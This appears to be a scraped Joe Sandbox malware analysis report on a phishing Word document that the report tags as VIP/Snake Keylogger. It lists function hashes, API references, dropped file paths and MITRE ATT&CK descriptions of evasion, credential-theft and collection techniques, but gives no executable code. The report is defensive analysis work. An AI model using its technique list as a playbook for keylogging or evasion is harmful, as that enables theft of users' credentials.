Instruction Fuzzy Hash: 2481C274E00218CFDB18DFA9C891BADBBB2BF88304F249129D815AB398DB355D46CF54

Function 00672AD8 Relevance: 1.6, APIs: 1, Instructions: 124libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(000000FF), ref: 00672C3A

Memory Dump Source

Source File: 00000008.00000002.916806771.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_670000_hgqilegacy20306.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f6143fb2cceee6fd6dcb06603d80286c6b64cb6c6f9370716d0559dccc994827
Instruction ID: e69617c34390dd38cf20fe05cd647507584e290ebac3b3b09209cbda583eb3e1
Opcode Fuzzy Hash: f6143fb2cceee6fd6dcb06603d80286c6b64cb6c6f9370716d0559dccc994827
Instruction Fuzzy Hash: 455136B4D00219CFDB18CFAAD8846DDBBB2BF88314F20C52AE418BB294D7744946CF50

Function 00672C73 Relevance: 1.6, APIs: 1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.916806771.0000000000670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00670000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_670000_hgqilegacy20306.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7bceb6cf1db8c5720e1f2bd5686e07f213de6bbd02448ea15fe0e0409939f5e
Instruction ID: 5855c360e62c6160edc93e7870512602403622862ae4c9341616aebd4a7c6e5f
Opcode Fuzzy Hash: c7bceb6cf1db8c5720e1f2bd5686e07f213de6bbd02448ea15fe0e0409939f5e
Instruction Fuzzy Hash: 565110B4D0020ACFCB24CFA8D4986DDBBB2BF59314F20952AE419BB294D3349986CF10

Function 006E76A9 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 006E7720

Memory Dump Source

Source File: 00000008.00000002.916820129.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6e0000_hgqilegacy20306.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: b6a319e151f05496095ea51456f505191e362d462df5ac47048559c4ec147964
Instruction ID: ed019516425159cea8e756136b354f32fb46bc6024d37a3250a42a237ab6e9c0
Opcode Fuzzy Hash: b6a319e151f05496095ea51456f505191e362d462df5ac47048559c4ec147964
Instruction Fuzzy Hash: 9121BCB9D042589FCB10CFAAD984ADEFBF4EB49310F24905AE814B7310D374A945CFA5

Function 006E6B84 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 006E7720

Memory Dump Source

Source File: 00000008.00000002.916820129.00000000006E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6e0000_hgqilegacy20306.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: 41762b8645bb00dccc385fd7510b75da5072a14d2d3a09e4e16ebaab14914395
Instruction ID: dc9fa1201867a6d251a164460ff5b5862e090eeeed05f2b17810401ef67ab1d1
Opcode Fuzzy Hash: 41762b8645bb00dccc385fd7510b75da5072a14d2d3a09e4e16ebaab14914395
Instruction Fuzzy Hash: D4219EB4D052589FCF10CF9AD584ADEBBF4EB49314F24905AE814B7310D375A945CFA4

Function 0025E133 Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(00000000), ref: 0025E275

Memory Dump Source

Source File: 00000008.00000002.916644970.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_250000_hgqilegacy20306.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3950d7327043e6a0be120badf075a34973938d3553c843bd4ca123311ce18573
Instruction ID: deccd14e218b07554dc4685cea3f867904e434ef3362a4635142866a720774c5
Opcode Fuzzy Hash: 3950d7327043e6a0be120badf075a34973938d3553c843bd4ca123311ce18573
Instruction Fuzzy Hash: DA11AF74E101199FDF08CFA8C8C4AACBBB9FB88305F658555EC14E7245D7309E09CB14

Function 00613E68 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.916782898.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_610000_hgqilegacy20306.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d5d8e5892902d856d7bf500f819ee87c4beaa04d01d4fea0bd4a364b29274b7
Instruction ID: 31081be3f6909151a27092f3159d9951cb35af60440dee6dbcf1e54f413f1ea7
Opcode Fuzzy Hash: 7d5d8e5892902d856d7bf500f819ee87c4beaa04d01d4fea0bd4a364b29274b7
Instruction Fuzzy Hash: 5871F274E00218CFDB18DFA5C891AEDBBB2BF88300F249129D809AB359DB359D46CF54

Function 00569320 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.916748713.0000000000560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_560000_hgqilegacy20306.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffbdeefc664b83ae1113d1fa22483b7e98b7e7202325101a21348f8bf25a596c
Instruction ID: fb09442d3e770f460ac0a8e146dde8e454137a431051c268f013c17fb87c8b14
Opcode Fuzzy Hash: ffbdeefc664b83ae1113d1fa22483b7e98b7e7202325101a21348f8bf25a596c
Instruction Fuzzy Hash: 45710474E00218CFDB18DFA9C991AEDBBB2BF88300F249529D405AB359DB359D46CF50

Function 00569FC8 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.916748713.0000000000560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_560000_hgqilegacy20306.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 278362b145f8035929a215985ae6e239e4300f3a8a377147cc4b82013986d448
Instruction ID: d414e36aebd7ebea558a59453e648941dfad0228728cbcd39a22ca7cdf2c7c4d
Opcode Fuzzy Hash: 278362b145f8035929a215985ae6e239e4300f3a8a377147cc4b82013986d448
Instruction Fuzzy Hash: 6071F374E00218CFDB18DFA9C991AADBBB2BF89300F249529D415BB399DB359D42CF50

Function 0061A112 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.916782898.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_610000_hgqilegacy20306.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04fd4b099f127267bb51f94a9db0fcc0803be7732263a648e93f38f944abb287
Instruction ID: 9c6f06a2f58e89f9b6aa77f275887dfcddf435e183a40af7d7e54fd02bb5e951
Opcode Fuzzy Hash: 04fd4b099f127267bb51f94a9db0fcc0803be7732263a648e93f38f944abb287
Instruction Fuzzy Hash: 8531E074E012088BDB48DFEAC8546EEBBF2BF89300F14D12AD419AB259EB744946CF55

Function 00569314 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.916748713.0000000000560000.00000040.00000800.00020000.00000000.sdmp, Offset: 00560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_560000_hgqilegacy20306.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a97e3274ffb545cf512d7bdffeff9f09e17c0502077572ca459f0c0fdd988c9d
Instruction ID: 112144f91a6b138009df277eeda9bc5a02b5048a20069ba88ad115b1814ebbea
Opcode Fuzzy Hash: a97e3274ffb545cf512d7bdffeff9f09e17c0502077572ca459f0c0fdd988c9d
Instruction Fuzzy Hash: E231E074E002088BDB08DFAAC9546EEBBF2BF89300F24D42AD419AB255EB345946CF54

Function 000AD554 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.916526969.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ad000_hgqilegacy20306.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f13b513ed56659d129482a0d2af91e69ea718c8db5e4e18bac66f5a924dcd70
Instruction ID: 9e21e4f95f53b6f6e2175c269e8f4f9cba5d7995395492b2a5476be1849135d0
Opcode Fuzzy Hash: 9f13b513ed56659d129482a0d2af91e69ea718c8db5e4e18bac66f5a924dcd70
Instruction Fuzzy Hash: 552125B1904240EFDB11CF64D8C0B2ABFA1FB89314F24C56AE80A0B646C336D856CBA1

Function 000BD044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.916548795.00000000000BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_bd000_hgqilegacy20306.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c512f6542b75752026bcc7c7ebee0a5aa63adf74f83136c5023205d5228ae7a5
Instruction ID: 573a798398b19edb91c2688f43cb1ddf8b7e2dbe8f2e6ef5fb82b1ec3581c3b3
Opcode Fuzzy Hash: c512f6542b75752026bcc7c7ebee0a5aa63adf74f83136c5023205d5228ae7a5
Instruction Fuzzy Hash: 722104B1614244EFDB21DF24D8C4B66FBA1FB84314F34C9AAE8494B246D73AD846CB61

Function 000BD3B4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.916548795.00000000000BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_bd000_hgqilegacy20306.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6f1873334ec22b37ada6fe7344f76283a7ab01954d68674444807df4ce0aa78
Instruction ID: 837e536989eb25ffecb997aa6f195dfaa2320ee2c40cce8ffd6d0cb38beb7269
Opcode Fuzzy Hash: b6f1873334ec22b37ada6fe7344f76283a7ab01954d68674444807df4ce0aa78
Instruction Fuzzy Hash: DA21D475604340EFDB15CF14D8C0B66FBA5EB84714F24C9AAE8494B246D736E846CBA1

Function 000AD54F Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.916526969.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ad000_hgqilegacy20306.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce44f6fe7a28b32b333783b460579ef617a672a1c87bb5bd3d66835bf8f739a8
Instruction ID: 48f15d2fdbb0dd5e16a182d9b4b8ffd0fe30a6382a853623d77bf5470d1a4209
Opcode Fuzzy Hash: ce44f6fe7a28b32b333783b460579ef617a672a1c87bb5bd3d66835bf8f739a8
Instruction Fuzzy Hash: F411D376904280CFDB12CF54D9C4B56BFB1FB85314F24C6AAD8094B656C336D85ACBA2

Function 000BD3AF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.916548795.00000000000BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_bd000_hgqilegacy20306.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
Instruction ID: 580c522b5ef90b98862f82f98c40a52113c760df7ac53a49ff79566927aa3c38
Opcode Fuzzy Hash: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
Instruction Fuzzy Hash: 12119D75504280DFDB02CF14D5C4B55FFA1FB85314F28C6AED8494B656C33AE84ACBA1

Function 000BD03F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.916548795.00000000000BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_bd000_hgqilegacy20306.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
Instruction ID: 432d93f8f86c2d0e6069f7baff076e5d8f2beae8b5e889268f33bb3bec877eaa
Opcode Fuzzy Hash: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
Instruction Fuzzy Hash: 26118B75504284DFDB12CF14D9C4B55FFA1FB84314F28CAAAD8494B656C33AD84ACFA2

Function 000AD01F Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.916526969.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ad000_hgqilegacy20306.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53027816b571be511fe5db298b55ca593b1a6d3fd595ea86e98811f51730ed09
Instruction ID: dbc704d3ca4038276b9915b5282f2b0eabee19ebdfd0131831249ebf5c6e64dc
Opcode Fuzzy Hash: 53027816b571be511fe5db298b55ca593b1a6d3fd595ea86e98811f51730ed09
Instruction Fuzzy Hash: 58F049B6200604AF93248F0AC884C27FBADEBC5770719C59AEC4A4B612C671EC42CBA0

Function 000AD014 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.916526969.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_ad000_hgqilegacy20306.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80baed75f08881b1d2afba685240ce088484f97126b05f565220feba4fa261a6
Instruction ID: 7135b35cda0e4c39cbfd99a090209e191bdf4d8062f15d4f60185dc8683d6dae
Opcode Fuzzy Hash: 80baed75f08881b1d2afba685240ce088484f97126b05f565220feba4fa261a6
Instruction Fuzzy Hash: ADF0F975100640AFD3258F06C884D63BBB9EB857607198589A85A5B712C674FC42CB60

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ( Security Software Discovery ) to evade.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Thyssenkrupp PO040232.doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

Exploits

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Exploits

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\XcsQpLjhNNvxYtrw[1].exe

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{61F2494D-B578-458F-8F63-015293F99DA2}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{248D8B6E-043C-4C19-9A89-CAC72B9BE239}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{C46604C6-B56E-488C-8C5B-49457D2A721D}.tmp

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E2DECFB2-ADA4-4B5F-990B-FC73115868E7}.tmp

C:\Users\user\AppData\Local\Temp\dgm5xaa0.ljc.psm1

C:\Users\user\AppData\Local\Temp\m0e2fsxs.vl2.ps1

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Thyssenkrupp PO040232.LNK

Windows Analysis Report
Thyssenkrupp PO040232.doc

Function 002ACB15 Relevance: 6.1, APIs: 4, Instructions: 112
libraryCOMMON

Function 002ACA8B Relevance: 4.7, APIs: 3, Instructions: 162
processfilenetworkCOMMON

Function 002ACB2F Relevance: 4.6, APIs: 3, Instructions: 97
COMMON

Function 002ACB9C Relevance: 4.6, APIs: 3, Instructions: 71
filenetworkCOMMON

Function 002ACBB5 Relevance: 3.1, APIs: 2, Instructions: 77
COMMON

Function 002ACBD6 Relevance: 3.1, APIs: 2, Instructions: 56
processCOMMON

Function 002ACC0F Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 002ACC16 Relevance: .0, Instructions: 14
COMMON

Function 002ACA56 Relevance: 1.6, APIs: 1, Instructions: 75
COMMON

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
